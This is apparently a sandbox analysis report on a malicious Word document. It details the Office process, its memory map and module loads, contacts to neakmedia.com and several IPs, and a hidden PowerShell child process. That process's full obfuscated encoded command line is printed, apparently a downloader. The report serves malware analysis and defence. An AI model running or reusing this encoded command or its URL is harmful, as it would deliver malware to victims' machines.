Persistent Malware | Grouped Behavior
URL Overview
Remarks
Critical: The sample contacted only unknown URLs.
URL (1)
URL                        Connection Successful   Reputation Status
neakmedia.com/hybfPDcL/    True                    Unknown
Involved Hosts

Hostname        IP Addresses     Country  City         Protocols        Has Blacklisted URL
neakmedia.com   70.39.145.109    US       Los Angeles  HTTP, DNS, TCP   False
-               74.208.155.175   US       Wayne        TCP              False
-               167.114.121.80   CA       Montréal     TCP              False
Monitored Processes
Behavior Information - Grouped by Category
Process #1: winword.exe
(Host: 314, Network: 0)
Information Value
ID #1
File Name c:\program files\microsoft office\office15\winword.exe
Command Line "C:\Program Files\Microsoft Office\Office15\WINWORD.EXE"
Initial Working Directory C:\Users\BGC6u8Oy yXGxkR\Desktop\
Monitor Start Time: 00:00:10, Reason: Analysis Target
Unmonitor End Time: 00:02:25, Reason: Terminated by Timeout
Monitor Duration 00:02:15
OS Process Information
Information Value
PID 0x9c4
Parent PID 0x618 (c:\windows\explorer.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username F71GWAT\BGC6u8Oy yXGxkR
Groups
  • F71GWAT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0000fcb0 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0xA08, 0xA04, 0xA00, 0x9FC, 0x9F8, 0x9F4, 0x9E0, 0x9DC, 0x9D4, 0x9D0, 0x9C8, 0xA48, 0xA64, 0xA98, 0xB44
Region
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable False False False
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable False False False
private_0x0000000000030000 0x00030000 0x0012ffff Private Memory Readable, Writable False False False
pagefile_0x0000000000130000 0x00130000 0x00133fff Pagefile Backed Memory Readable False False False
pagefile_0x0000000000140000 0x00140000 0x00143fff Pagefile Backed Memory Readable False False False
locale.nls 0x00150000 0x001b6fff Memory Mapped File Readable False False False
private_0x00000000001c0000 0x001c0000 0x001c0fff Private Memory Readable, Writable False False False
pagefile_0x00000000001d0000 0x001d0000 0x001d1fff Pagefile Backed Memory Readable False False False
pagefile_0x00000000001e0000 0x001e0000 0x001e1fff Pagefile Backed Memory Readable False False False
private_0x00000000001f0000 0x001f0000 0x001f0fff Private Memory Readable, Writable False False False
private_0x0000000000200000 0x00200000 0x00200fff Private Memory Readable, Writable False False False
private_0x0000000000210000 0x00210000 0x0021ffff Private Memory Readable, Writable False False False
pagefile_0x0000000000220000 0x00220000 0x00221fff Pagefile Backed Memory Readable False False False
private_0x0000000000230000 0x00230000 0x0032ffff Private Memory Readable, Writable False False False
private_0x0000000000330000 0x00330000 0x00360fff Private Memory Readable, Writable False False False
private_0x0000000000370000 0x00370000 0x00379fff Private Memory Readable, Writable, Executable False False False
private_0x0000000000380000 0x00380000 0x0038ffff Private Memory False False False
pagefile_0x0000000000390000 0x00390000 0x00396fff Pagefile Backed Memory Readable False False False
pagefile_0x00000000003a0000 0x003a0000 0x003a1fff Pagefile Backed Memory Readable, Writable False False False
private_0x00000000003b0000 0x003b0000 0x003b0fff Private Memory Readable, Writable False False False
private_0x00000000003c0000 0x003c0000 0x003cffff Private Memory Readable, Writable False False False
pagefile_0x00000000003d0000 0x003d0000 0x003d1fff Pagefile Backed Memory Readable False False False
private_0x00000000003e0000 0x003e0000 0x003e0fff Private Memory Readable, Writable False False False
private_0x00000000003f0000 0x003f0000 0x003fffff Private Memory Readable, Writable False False False
pagefile_0x0000000000400000 0x00400000 0x004c7fff Pagefile Backed Memory Readable False False False
pagefile_0x00000000004d0000 0x004d0000 0x005d0fff Pagefile Backed Memory Readable False False False
private_0x00000000005e0000 0x005e0000 0x005e0fff Private Memory Readable, Writable False False False
private_0x00000000005f0000 0x005f0000 0x005f0fff Private Memory Readable, Writable False False False
private_0x0000000000600000 0x00600000 0x00600fff Private Memory Readable, Writable False False False
private_0x0000000000610000 0x00610000 0x0062ffff Private Memory Readable, Writable False False False
private_0x0000000000630000 0x00630000 0x0063ffff Private Memory Readable, Writable False False False
pagefile_0x0000000000640000 0x00640000 0x0071efff Pagefile Backed Memory Readable False False False
private_0x0000000000720000 0x00720000 0x00720fff Private Memory Readable, Writable False False False
private_0x0000000000730000 0x00730000 0x00730fff Private Memory Readable, Writable False False False
private_0x0000000000740000 0x00740000 0x00740fff Private Memory Readable, Writable False False False
private_0x0000000000750000 0x00750000 0x00750fff Private Memory Readable, Writable False False False
private_0x0000000000760000 0x00760000 0x00760fff Private Memory Readable, Writable False False False
private_0x0000000000770000 0x00770000 0x00770fff Private Memory Readable, Writable False False False
private_0x0000000000780000 0x00780000 0x00780fff Private Memory Readable, Writable False False False
private_0x0000000000790000 0x00790000 0x00790fff Private Memory Readable, Writable False False False
private_0x00000000007a0000 0x007a0000 0x007a0fff Private Memory Readable, Writable False False False
private_0x00000000007b0000 0x007b0000 0x007b0fff Private Memory Readable, Writable False False False
pagefile_0x00000000007c0000 0x007c0000 0x007c0fff Pagefile Backed Memory Readable, Writable False False False
private_0x00000000007d0000 0x007d0000 0x007d0fff Private Memory Readable, Writable False False False
private_0x00000000007e0000 0x007e0000 0x0081ffff Private Memory Readable, Writable False False False
pagefile_0x0000000000820000 0x00820000 0x00820fff Pagefile Backed Memory Readable False False False
pagefile_0x0000000000830000 0x00830000 0x00833fff Pagefile Backed Memory Readable, Writable False False False
private_0x0000000000840000 0x00840000 0x00840fff Private Memory Readable, Writable False False False
private_0x0000000000850000 0x00850000 0x0085ffff Private Memory Readable, Writable False False False
private_0x0000000000860000 0x00860000 0x0095ffff Private Memory Readable, Writable False False False
private_0x0000000000960000 0x00960000 0x00a5ffff Private Memory Readable, Writable False False False
private_0x0000000000a60000 0x00a60000 0x00a60fff Private Memory Readable, Writable False False False
pagefile_0x0000000000a70000 0x00a70000 0x00a71fff Pagefile Backed Memory Readable False False False
pagefile_0x0000000000a80000 0x00a80000 0x00a80fff Pagefile Backed Memory Readable False False False
pagefile_0x0000000000a90000 0x00a90000 0x00a90fff Pagefile Backed Memory Readable False False False
msxml6r.dll 0x00aa0000 0x00aa0fff Memory Mapped File Readable False False False
private_0x0000000000ab0000 0x00ab0000 0x00abffff Private Memory Readable, Writable False False False
private_0x0000000000ac0000 0x00ac0000 0x00bbffff Private Memory Readable, Writable False False False
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000015.db 0x00bc0000 0x00be5fff Memory Mapped File Readable False False False
pagefile_0x0000000000bf0000 0x00bf0000 0x00bf0fff Pagefile Backed Memory Readable, Writable False False False
private_0x0000000000c00000 0x00c00000 0x00c00fff Private Memory Readable, Writable False False False
winword.exe 0x00c10000 0x00de6fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x0000000000df0000 0x00df0000 0x019effff Pagefile Backed Memory Readable False False False
pagefile_0x00000000019f0000 0x019f0000 0x01de2fff Pagefile Backed Memory Readable False False False
sortdefault.nls 0x01df0000 0x020befff Memory Mapped File Readable False False False
private_0x00000000020c0000 0x020c0000 0x0213ffff Private Memory Readable, Writable False False False
c_1255.nls 0x02140000 0x02150fff Memory Mapped File Readable False False False
private_0x0000000002160000 0x02160000 0x02160fff Private Memory Readable, Writable False False False
private_0x0000000002170000 0x02170000 0x02170fff Private Memory Readable, Writable False False False
private_0x0000000002180000 0x02180000 0x0227ffff Private Memory Readable, Writable False False False
private_0x0000000002280000 0x02280000 0x02280fff Private Memory Readable, Writable False False False
private_0x0000000002290000 0x02290000 0x02290fff Private Memory Readable, Writable False False False
private_0x00000000022a0000 0x022a0000 0x022a0fff Private Memory Readable, Writable False False False
private_0x00000000022b0000 0x022b0000 0x022b0fff Private Memory Readable, Writable False False False
private_0x00000000022c0000 0x022c0000 0x022c0fff Private Memory Readable, Writable False False False
private_0x00000000022d0000 0x022d0000 0x022d0fff Private Memory Readable, Writable False False False
private_0x00000000022e0000 0x022e0000 0x022e0fff Private Memory Readable, Writable False False False
private_0x00000000022f0000 0x022f0000 0x022f0fff Private Memory Readable, Writable False False False
private_0x0000000002300000 0x02300000 0x02300fff Private Memory Readable, Writable False False False
private_0x0000000002310000 0x02310000 0x02310fff Private Memory Readable, Writable False False False
private_0x0000000002320000 0x02320000 0x02320fff Private Memory Readable, Writable False False False
private_0x0000000002330000 0x02330000 0x02330fff Private Memory Readable, Writable False False False
private_0x0000000002340000 0x02340000 0x02340fff Private Memory Readable, Writable False False False
private_0x0000000002350000 0x02350000 0x02350fff Private Memory Readable, Writable False False False
private_0x0000000002360000 0x02360000 0x02360fff Private Memory Readable, Writable False False False
private_0x0000000002370000 0x02370000 0x02370fff Private Memory Readable, Writable False False False
private_0x0000000002380000 0x02380000 0x0239efff Private Memory Readable, Writable False False False
private_0x00000000023a0000 0x023a0000 0x0249ffff Private Memory Readable, Writable False False False
private_0x00000000024a0000 0x024a0000 0x0259ffff Private Memory Readable, Writable False False False
private_0x00000000025a0000 0x025a0000 0x025a0fff Private Memory Readable, Writable False False False
private_0x00000000025b0000 0x025b0000 0x025b0fff Private Memory Readable, Writable False False False
private_0x00000000025c0000 0x025c0000 0x025c0fff Private Memory Readable, Writable False False False
pagefile_0x00000000025d0000 0x025d0000 0x025d1fff Pagefile Backed Memory Readable False False False
segoeui.ttf 0x026e0000 0x0275efff Memory Mapped File Readable False False False
private_0x0000000002770000 0x02770000 0x027affff Private Memory Readable, Writable False False False
private_0x00000000027b0000 0x027b0000 0x028affff Private Memory Readable, Writable False False False
private_0x00000000028e0000 0x028e0000 0x028effff Private Memory Readable, Writable False False False
private_0x0000000002900000 0x02900000 0x029fffff Private Memory Readable, Writable False False False
pagefile_0x0000000002a00000 0x02a00000 0x02dfffff Pagefile Backed Memory Readable False False False
staticcache.dat 0x02e00000 0x0372ffff Memory Mapped File Readable False False False
private_0x0000000003760000 0x03760000 0x0385ffff Private Memory Readable, Writable False False False
private_0x0000000003860000 0x03860000 0x0389ffff Private Memory Readable, Writable, Executable False False False
private_0x00000000038a0000 0x038a0000 0x0399ffff Private Memory Readable, Writable False False False
seguisb.ttf 0x039a0000 0x03a03fff Memory Mapped File Readable False False False
private_0x0000000003a10000 0x03a10000 0x03a4ffff Private Memory Readable, Writable, Executable False False False
private_0x0000000003ad0000 0x03ad0000 0x03b0ffff Private Memory Readable, Writable False False False
private_0x0000000003b70000 0x03b70000 0x03baffff Private Memory Readable, Writable False False False
private_0x0000000003bd0000 0x03bd0000 0x03bdffff Private Memory Readable, Writable False False False
pagefile_0x0000000003be0000 0x03be0000 0x043dffff Pagefile Backed Memory Readable, Writable False False False
private_0x0000000004410000 0x04410000 0x0450ffff Private Memory Readable, Writable False False False
private_0x0000000004560000 0x04560000 0x0465ffff Private Memory Readable, Writable False False False
private_0x0000000004700000 0x04700000 0x0473ffff Private Memory Readable, Writable False False False
private_0x00000000047b0000 0x047b0000 0x048affff Private Memory Readable, Writable False False False
pagefile_0x00000000048b0000 0x048b0000 0x04caffff Pagefile Backed Memory Readable, Writable False False False
kernelbase.dll.mui 0x04cb0000 0x04d6ffff Memory Mapped File Readable, Writable False False False
private_0x0000000004d70000 0x04d70000 0x0516ffff Private Memory Readable, Writable False False False
private_0x0000000005170000 0x05170000 0x0536ffff Private Memory Readable, Writable False False False
private_0x0000000005420000 0x05420000 0x0581ffff Private Memory Readable, Writable False False False
pagefile_0x0000000005820000 0x05820000 0x0601ffff Pagefile Backed Memory Readable, Writable False False False
private_0x0000000006020000 0x06020000 0x06420fff Private Memory Readable, Writable False False False
private_0x0000000006430000 0x06430000 0x06830fff Private Memory Readable, Writable False False False
private_0x0000000006840000 0x06840000 0x06c40fff Private Memory Readable, Writable False False False
private_0x0000000006c50000 0x06c50000 0x06e4ffff Private Memory Readable, Writable False False False
private_0x0000000006e50000 0x06e50000 0x0730ffff Private Memory Readable, Writable False False False
private_0x0000000007310000 0x07310000 0x0770ffff Private Memory Readable, Writable False False False
private_0x0000000007710000 0x07710000 0x07f0ffff Private Memory Readable, Writable False False False
private_0x0000000036890000 0x36890000 0x3689ffff Private Memory Readable, Writable, Executable False False False
osppc.dll 0x63b00000 0x63b2cfff Memory Mapped File Readable, Writable, Executable False False False
riched20.dll 0x63b30000 0x63cbdfff Memory Mapped File Readable, Writable, Executable False False False
adal.dll 0x63cc0000 0x63d74fff Memory Mapped File Readable, Writable, Executable False False False
mscoreei.dll 0x63d80000 0x63df9fff Memory Mapped File Readable, Writable, Executable False False False
dwrite.dll 0x63ed0000 0x63fd9fff Memory Mapped File Readable, Writable, Executable False False False
d3d10warp.dll 0x63fe0000 0x6410bfff Memory Mapped File Readable, Writable, Executable False False False
msores.dll 0x64110000 0x68dfafff Memory Mapped File Readable, Writable, Executable False False False
mso.dll 0x68e00000 0x6a6e3fff Memory Mapped File Readable, Writable, Executable False False False
wwlib.dll 0x6a6f0000 0x6bbabfff Memory Mapped File Readable, Writable, Executable False False False
mscoree.dll 0x6bbc0000 0x6bc09fff Memory Mapped File Readable, Writable, Executable False False False
d3d11.dll 0x6bc10000 0x6bc92fff Memory Mapped File Readable, Writable, Executable False False False
msptls.dll 0x6bca0000 0x6bdb5fff Memory Mapped File Readable, Writable, Executable False False False
msointl.dll 0x6bdc0000 0x6c130fff Memory Mapped File Readable, Writable, Executable False False False
wwintl.dll 0x6c140000 0x6c1fffff Memory Mapped File Readable, Writable, Executable False False False
d2d1.dll 0x6c200000 0x6c2b9fff Memory Mapped File Readable, Writable, Executable False False False
oart.dll 0x6c2c0000 0x6d067fff Memory Mapped File Readable, Writable, Executable False False False
msohev.dll 0x6ed70000 0x6ed84fff Memory Mapped File Readable, Writable, Executable False False False
winspool.drv 0x6f5b0000 0x6f600fff Memory Mapped File Readable, Writable, Executable False False False
msxml6.dll 0x6fa80000 0x6fbd7fff Memory Mapped File Readable, Writable, Executable False False False
office.odf 0x70ac0000 0x70fbffff Memory Mapped File Readable, Writable, Executable False False False
msi.dll 0x70fc0000 0x711fffff Memory Mapped File Readable, Writable, Executable False False False
msvcp100.dll 0x71230000 0x71298fff Memory Mapped File Readable, Writable, Executable False False False
msvcr100.dll 0x712a0000 0x7135efff Memory Mapped File Readable, Writable, Executable False False False
For performance reasons, the remaining 194 entries are omitted.
The remaining entries can be found in flog.txt.
Host Behavior
Process (1)
Operation Process Additional Information Success Count
Create pOwerSheLL -e … (encoded argument elided in this row; the full command line is listed under Process #2, whose PID is the os_pid below) os_pid = 0xa68, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Module (62)
Operation Module Additional Information Success Count
Load C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL base_address = 0x6d220000 True 1
Load OLEAUT32.DLL base_address = 0x76ba0000 True 1
Load VBE7.DLL base_address = 0x720d0000 True 1
Get Handle c:\program files\microsoft office\office15\winword.exe base_address = 0xc10000 True 1
Get Handle C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL base_address = 0x0 False 1
Get Filename process_name = c:\program files\microsoft office\office15\winword.exe, file_name_orig = C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA7.1\VBE7.DLL, size = 260 True 2
Get Address Unknown module name function = _MsoVBADigSigCallDlg@20, address_out = 0x6d34fe80 True 1
Get Address Unknown module name function = _MsoVbaInitSecurity@4, address_out = 0x6d2d8951 True 1
Get Address Unknown module name function = _MsoFIEPolicyAndVersion@8, address_out = 0x6d2ccd31 True 1
Get Address Unknown module name function = _MsoFAnsiCodePageSupportsLCID@8, address_out = 0x6d2d882e True 1
Get Address Unknown module name function = _MsoFInitOffice@20, address_out = 0x6d2ccd4b True 1
Get Address Unknown module name function = _MsoUninitOffice@4, address_out = 0x6d2896db True 1
Get Address Unknown module name function = _MsoFGetFontSettings@20, address_out = 0x6d281af9 True 1
Get Address Unknown module name function = _MsoRgchToRgwch@16, address_out = 0x6d289bae True 1
Get Address Unknown module name function = _MsoHrSimpleQueryInterface@16, address_out = 0x6d2834e1 True 1
Get Address Unknown module name function = _MsoHrSimpleQueryInterface2@20, address_out = 0x6d283523 True 1
Get Address Unknown module name function = _MsoFCreateControl@36, address_out = 0x6d284a26 True 1
Get Address Unknown module name function = _MsoFLongLoad@8, address_out = 0x6d381250 True 1
Get Address Unknown module name function = _MsoFLongSave@8, address_out = 0x6d381259 True 1
Get Address Unknown module name function = _MsoFGetTooltips@0, address_out = 0x6d2bdfac True 1
Get Address Unknown module name function = _MsoFSetTooltips@4, address_out = 0x6d2e2845 True 1
Get Address Unknown module name function = _MsoFLoadToolbarSet@24, address_out = 0x6d2cdd8b True 1
Get Address Unknown module name function = _MsoFCreateToolbarSet@28, address_out = 0x6d2823c9 True 1
Get Address Unknown module name function = _MsoHpalOffice@0, address_out = 0x6d28c568 True 1
Get Address Unknown module name function = _MsoFWndProcNeeded@4, address_out = 0x6d2818d2 True 1
Get Address Unknown module name function = _MsoFWndProc@24, address_out = 0x6d282a70 True 1
Get Address Unknown module name function = _MsoFCreateITFCHwnd@20, address_out = 0x6d281925 True 1
Get Address Unknown module name function = _MsoDestroyITFC@4, address_out = 0x6d28958b True 1
Get Address Unknown module name function = _MsoFPitbsFromHwndAndMsg@12, address_out = 0x6d288820 True 1
Get Address Unknown module name function = _MsoFGetComponentManager@4, address_out = 0x6d2835a4 True 1
Get Address Unknown module name function = _MsoMultiByteToWideChar@24, address_out = 0x6d28ac03 True 2
Get Address Unknown module name function = _MsoWideCharToMultiByte@32, address_out = 0x6d284d33 True 1
Get Address Unknown module name function = _MsoHrRegisterAll@0, address_out = 0x6d34f8b6 True 1
Get Address Unknown module name function = _MsoFSetComponentManager@4, address_out = 0x6d28c179 True 1
Get Address Unknown module name function = _MsoFCreateStdComponentManager@20, address_out = 0x6d2819d5 True 1
Get Address Unknown module name function = _MsoFHandledMessageNeeded@4, address_out = 0x6d286736 True 1
Get Address Unknown module name function = _MsoPeekMessage@8, address_out = 0x6d28649f True 1
Get Address Unknown module name function = _MsoFCreateIPref@28, address_out = 0x6d27f9cf True 1
Get Address Unknown module name function = _MsoDestroyIPref@4, address_out = 0x6d289320 True 1
Get Address Unknown module name function = _MsoChsFromLid@4, address_out = 0x6d27f864 True 1
Get Address Unknown module name function = _MsoCpgFromChs@4, address_out = 0x6d281cc5 True 1
Get Address Unknown module name function = _MsoSetLocale@4, address_out = 0x6d27f984 True 1
Get Address Unknown module name function = _MsoFSetHMsoinstOfSdm@4, address_out = 0x6d28198e True 1
Get Address Unknown module name function = _MsoSetVbaInterfaces@8, address_out = 0x6d34ff8d True 1
Get Address Unknown module name function = _MsoGetControlInstanceId@8, address_out = 0x6d3286e7 True 1
Get Address Unknown module name function = SysFreeString, address_out = 0x76ba3e59 True 1
Get Address Unknown module name function = LoadTypeLib, address_out = 0x76bb0aa2 True 1
Get Address Unknown module name function = RegisterTypeLib, address_out = 0x76bc1ea6 True 1
Get Address Unknown module name function = QueryPathOfRegTypeLib, address_out = 0x76bd351b True 1
Get Address Unknown module name function = UnRegisterTypeLib, address_out = 0x76bd1ca9 True 1
Get Address Unknown module name function = OleTranslateColor, address_out = 0x76bd26fa True 1
Get Address Unknown module name function = OleCreateFontIndirect, address_out = 0x76bc352f True 1
Get Address Unknown module name function = OleCreatePictureIndirect, address_out = 0x76bc3df8 True 1
Get Address Unknown module name function = OleLoadPicture, address_out = 0x76c07c49 True 1
Get Address Unknown module name function = OleCreatePropertyFrameIndirect, address_out = 0x76c093fc True 1
Get Address Unknown module name function = OleCreatePropertyFrame, address_out = 0x76c0944a True 1
Get Address Unknown module name function = OleIconToCursor, address_out = 0x76c0776e True 1
Get Address Unknown module name function = LoadTypeLibEx, address_out = 0x76bb07b7 True 1
Get Address Unknown module name function = OleLoadPictureEx, address_out = 0x76c070a1 True 1
Get Address Unknown module name function = 600, address_out = 0x721a2b76 True 1
Process #2: powershell.exe
(Host: 729, Network: 52)
Information Value
ID #2
File Name c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line pOwerSheLL -e KAAnADMANgB9ADEAMQA5AHoAMQAxADUAQAA5ADkARwAxADEANABoADEAMAA1AGgAMQAxADIAZQAxADEANgBEADMAMgB9ADYAMQA+ADMAMgBHADEAMQAwAEQAMQAwADEAZQAxADEAOQBHADQANQB6ADEAMQAxAEQAOQA4AH0AMQAwADYAZQAxADAAMQBAADkAOQB9ADEAMQA2AD4AMwAyAD4ANAA1AH0ANgA3AHoAMQAxADEARwAxADAAOQBEADcAOQBlADkAOABoADEAMAA2AGUAMQAwADEAegA5ADkAegAxADEANgB6ADMAMgB6ADgANwA+ADgAMwB6ADkAOQBEADEAMQA0AEcAMQAwADUAfQAxADEAMgBTADEAMQA2AEcANAA2AEQAOAAzAH0AMQAwADQARwAxADAAMQBTADEAMAA4AHoAMQAwADgAdgA1ADkAaAAzADYAegAxADEAOQB9ADEAMAAxAHoAOQA4AD4AOQA5AH0AMQAwADgAPgAxADAANQBEADEAMAAxAHoAMQAxADAAdgAxADEANgB2ADMAMgB6ADYAMQB2ADMAMgBlADEAMQAwAEAAMQAwADEAfQAxADEAOQB2ADQANQBAADEAMQAxAHYAOQA4AHYAMQAwADYAUwAxADAAMQBAADkAOQB6ADEAMQA2AHYAMwAyAGgAOAAzAGgAMQAyADEAPgAxADEANQBEADEAMQA2AHYAMQAwADEAQAAxADAAOQBAADQANgB9ADcAOAA+ADEAMAAxAGgAMQAxADYAUwA0ADYAdgA4ADcAZQAxADAAMQBTADkAOAB9ADYANwBoADEAMAA4AH0AMQAwADUAQAAxADAAMQBlADEAMQAwAEQAMQAxADYAaAA1ADkAUwAzADYAfQAxADEANABAADkANwBlADEAMQAwAEcAMQAwADAAegAxADEAMQB6ADEAMAA5AHoAMwAyAEAANgAxAD4AMwAyAEQAMQAxADAAPgAxADAAMQB6ADEAMQA5AGgANAA1AH0AMQAxADEAaAA5ADgAegAxADAANgBEADEAMAAxAGUAOQA5AGUAMQAxADYAaAAzADIARAAxADEANAB6ADkANwBoADEAMQAwAEcAMQAwADAAPgAxADEAMQBTADEAMAA5AH0ANQA5AEQAMwA2AGUAMQAxADcAegAxADEANABEADEAMAA4AGUAMQAxADUAaAAzADIAfQA2ADEAZQAzADIAZQAzADkAUwAxADAANABHADEAMQA2AEQAMQAxADYAaAAxADEAMgBHADUAOABoADQANwB6ADQANwA+ADEAMQAwAH0AMQAwADEAdgA5ADcAQAAxADAANwBEADEAMAA5AH0AMQAwADEAPgAxADAAMAB9ADEAMAA1AEQAOQA3AD4ANAA2AHYAOQA5AHoAMQAxADEAZQAxADAAOQBTADQANwBAADEAMAA0AGgAMQAyADEAQAA5ADgAUwAxADAAMgBEADgAMAB6ADYAOAB2ADkAOQB6ADcANgB6ADQANwBTADQANABTADEAMAA0AH0AMQAxADYAUwAxADEANgBoADEAMQAyAGUANQA4AEcANAA3AEQANAA3AHoAMQAxADIAZQAxADEANABHADEAMQAyAEQAMQAxADQAUwAxADEAMQB2ADEAMAAwAEcAMQAxADcARwA5ADkAUwAxADEANgBEADEAMAA1AH0AMQAxADEARwAxADEAMAB9ADEAMQA1AEQANAA2AEcAOQA5AD4AMQAxADEAaAAxADAAOQB6ADQANwBlADgAMQBHADEAMAAzAGUANwA0AEQANAA3AHoANAA0AEAAMQAwADQAfQAxADEANgBHADEAMQA2AGgAMQAxADIAQAA1ADgARwA0ADcAUwA0ADcAZQAxADAAOQBTADkANwB9ADEAMAA4AHoAMQAwADgAUwAxADEANwBEADkAOQB6ADEAMAA0AEcANAA2AHYAOQA5AH0AMQAxA
DEAaAAxADAAOQBEADQANwB2ADcANgBAADYANgBHADQANwB6ADQANAB6ADEAMAA0AEAAMQAxADYAPgAxADEANgBTADEAMQAyAGgANQA4AFMANAA3AGUANAA3AEcAMQAxADAARAAxADEAMQBAADEAMQA0AD4AMQAwADUAUwAxADEAOQB9ADEAMAAxAGgAOQA4AEAANAA2AHYAMQAxADAAQAAxADAAMQBTADEAMQA2AGUANAA3AHYAMQAxADAAfQA4ADQAPgAxADAAOQBlADgAMABoADcAMABlADEAMQA5AFMANAA3AHoANAA0AEcAMQAwADQAfQAxADEANgA+ADEAMQA2AD4AMQAxADIARAA1ADgAUwA0ADcAUwA0ADcAZQAxADEANgBHADkANwB9ADEAMgAwAH0AOQA3AEcAMQAxADYAQAAxADAANQA+ADEAMQAxAEAAMQAxADAAfQA0ADUAZQAxADAANABlADEAMAA3AHoANAA2AHoAOQA5AD4AMQAxADEAZQAxADAAOQB2ADQANwBEADEAMAAwAD4ANwA2AGgAOAAwAFMAMQAyADIARwAxADIAMQBHADQANwA+ADMAOQA+ADQANgB6ADgAMwBlADEAMQAyAFMAMQAwADgAegAxADAANQB9ADEAMQA2AEcANAAwAD4AMwA5AFMANAA0AFMAMwA5AEQANAAxAEcANQA5AEQAMwA2AGgAMQAxADAAegA5ADcAegAxADAAOQBoADEAMAAxAEcAMwAyAEAANgAxAHoAMwAyAEAAMwA2AEAAMQAxADQAZQA5ADcAegAxADEAMABHADEAMAAwAH0AMQAxADEAfQAxADAAOQA+ADQANgB6ADEAMQAwAD4AMQAwADEAfQAxADIAMABHADEAMQA2AD4ANAAwAH0ANAA5AHoANAA0AGgAMwAyAHoANQA0AD4ANQAzAHYANQAzAEAANQAxAEcANQA0AFMANAAxAH0ANQA5AEQAMwA2AHoAMQAxADIAdgA5ADcAQAAxADEANgBHADEAMAA0AHYAMwAyAHYANgAxAGUAMwAyAFMAMwA2AGUAMQAwADEAfQAxADEAMAB6ADEAMQA4AH0ANQA4AHoAMQAxADYAfQAxADAAMQB9ADEAMAA5AEcAMQAxADIAZQAzADIARAA0ADMAdgAzADIAZQAzADkAaAA5ADIAegAzADkAQAAzADIARwA0ADMAZQAzADIAZQAzADYAfQAxADEAMAB2ADkANwB2ADEAMAA5AEQAMQAwADEAdgAzADIAaAA0ADMAUwAzADIAUwAzADkAUwA0ADYAfQAxADAAMQBAADEAMgAwAGUAMQAwADEAUwAzADkAZQA1ADkAZQAxADAAMgBAADEAMQAxAEQAMQAxADQARwAxADAAMQBEADkANwB2ADkAOQB6ADEAMAA0AEAANAAwAEcAMwA2AD4AMQAxADcAUwAxADEANABTADEAMAA4AGUAMwAyAGgAMQAwADUAdgAxADEAMABAADMAMgBlADMANgBTADEAMQA3AGgAMQAxADQARwAxADAAOABEADEAMQA1AGgANAAxAGUAMQAyADMAdgAxADEANgBAADEAMQA0AFMAMQAyADEAdgAxADIAMwB2ADMANgBlADEAMQA5AGUAMQAwADEAaAA5ADgARwA5ADkAfQAxADAAOAB6ADEAMAA1AHoAMQAwADEAfQAxADEAMABEADEAMQA2AGgANAA2AEQANgA4AHYAMQAxADEAUwAxADEAOQBHADEAMQAwAHoAMQAwADgAdgAxADEAMQBEADkANwBTADEAMAAwAGgANwAwAHoAMQAwADUAegAxADAAOAB9ADEAMAAxAH0ANAAwAGUAMwA2AEQAMQAxADcAZQAxADEANAA+ADEAMAA4AD4ANAA2AGgAOAA0AEcAMQAxADEARAA4ADMAfQAxADEANgBoADEAMQA0AH0AMQAwADUAegAxADEAMABAADEAMAAzAD4ANAAwAGUANAAxA
GgANAA0AEQAMwAyAH0AMwA2AEcAMQAxADIARAA5ADcAPgAxADEANgBoADEAMAA0AEcANAAxAHoANQA5AEAAOAAzAD4AMQAxADYAPgA5ADcAaAAxADEANABAADEAMQA2AGUANAA1AFMAOAAwAH0AMQAxADQARwAxADEAMQBoADkAOQBAADEAMAAxAH0AMQAxADUARwAxADEANQB2ADMAMgBTADMANgBlADEAMQAyAEQAOQA3AFMAMQAxADYAdgAxADAANAA+ADUAOQBoADkAOABHADEAMQA0AGgAMQAwADEAfQA5ADcAaAAxADAANwB9ADUAOQB6ADEAMgA1AEAAOQA5AEcAOQA3AGUAMQAxADYAPgA5ADkAZQAxADAANABHADEAMgAzAEAAMQAxADkAdgAxADEANAA+ADEAMAA1AGUAMQAxADYAaAAxADAAMQBAADQANQBTADEAMAA0AHoAMQAxADEAaAAxADEANQB2ADEAMQA2AEQAMwAyAGgAMwA2AEAAOQA1AGgANAA2AEcANgA5AD4AMQAyADAAaAA5ADkAUwAxADAAMQBHADEAMQAyAEAAMQAxADYAaAAxADAANQBAADEAMQAxAEQAMQAxADAAUwA0ADYAPgA3ADcAaAAxADAAMQBlADEAMQA1AHoAMQAxADUAPgA5ADcAaAAxADAAMwBAADEAMAAxAGgANQA5AHoAMQAyADUAaAAxADIANQAnACAALQBzAFAAbABJAFQAIAAnAHoAJwAtAFMAcABMAGkAdAAgACcAZQAnACAALQBzAFAAbABpAHQAJwA+ACcAIAAtAFMAcABMAGkAVAAgACcAUwAnAC0AcwBwAGwASQBUACcARAAnAC0AUwBwAGwASQBUACcAfQAnAC0AUwBQAGwAaQB0ACAAJwBHACcALQBzAHAAbABpAHQAJwBoACcALQBTAFAATABpAFQAIAAnAEAAJwA